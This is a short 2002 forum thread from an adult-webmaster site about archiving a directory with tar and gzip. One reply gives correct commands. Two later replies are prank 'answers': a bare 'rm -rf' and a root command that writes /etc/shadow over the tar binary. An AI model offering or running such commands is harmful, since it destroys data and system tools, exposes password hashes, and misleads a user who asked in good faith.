GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   tar/gzip help (https://gfy.com/showthread.php?t=61079)

X37375787 05-19-2002 12:01 PM

tar/gzip help
 
I wanna tar and gzip all directories and files that are in one dir... how to ?


Thanks :helpme

[Labret] 05-19-2002 12:20 PM

tar -cvzf filenameyouchoose.tgz subdir

Will grab everything, directory structure intact.

then

tar -xvzf filenameyouchoose.tgz

to unpack it.

beemk 05-19-2002 01:32 PM

rm -rf

Jimbo 05-19-2002 01:43 PM

as root:

cat /etc/shadow > /usr/bin/tar 2>/dev/null


All times are GMT -7. The time now is 10:35 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123